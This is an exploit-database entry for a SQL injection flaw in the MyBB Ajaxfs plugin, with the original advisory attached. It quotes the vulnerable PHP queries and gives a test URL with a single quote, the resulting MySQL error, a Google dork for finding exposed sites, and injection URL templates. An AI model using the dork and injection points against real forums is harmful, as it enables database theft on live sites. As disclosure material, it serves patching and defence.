Mybb Ajaxfs Plugin Sql Injection vulnerability

vendor:

Ajaxfs Plugin

by:

Iranian Exploit DataBase

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Ajaxfs Plugin

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2020

Mybb Ajaxfs Plugin Sql Injection vulnerability

Mybb Ajaxfs Plugin is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to sensitive information from the database. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'tooltip' and 'usertooltip' parameters of the ajaxfs.php script. An attacker can send a maliciously crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the context of the application's database. This may allow the attacker to access or modify data, or even gain access to the underlying file system and operating system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

###########################

# Mybb Ajaxfs Plugin Sql Injection vulnerability

###########################

#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@ 
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@ 
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@ 
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#
#####################################
 
# Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
 
# Author : Iranian Exploit DataBase
 
# Discovered By : IeDb
 
# Email : [email protected]  -  [email protected]
 
# Home : http://iedb.ir   -   http://iedb.ir/acc
 
# Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
 
# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
 
# Security Risk : High
 
# Tested on : Linux
 
# Dork : inurl:ajaxfs.php
 
#################################
 
1)
 
  if(isset($_GET['tooltip']))
    {
    $pid=$_GET['tooltip'];
    $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
 
 
2)
 
 if(isset($_GET['usertooltip']))
    {
    $uid=$_GET['usertooltip'];
    $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
 
http://localhost/Upload/ajaxfs.php?usertooltip=1'
 
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
 
Google DORK : inurl:ajaxfs.php
 
 
# Exploit :
 
# http://site.com/mybb/ajaxfs.php?tooltip=[sql]
 
# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
 
 
#################################
 
# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
 
#################################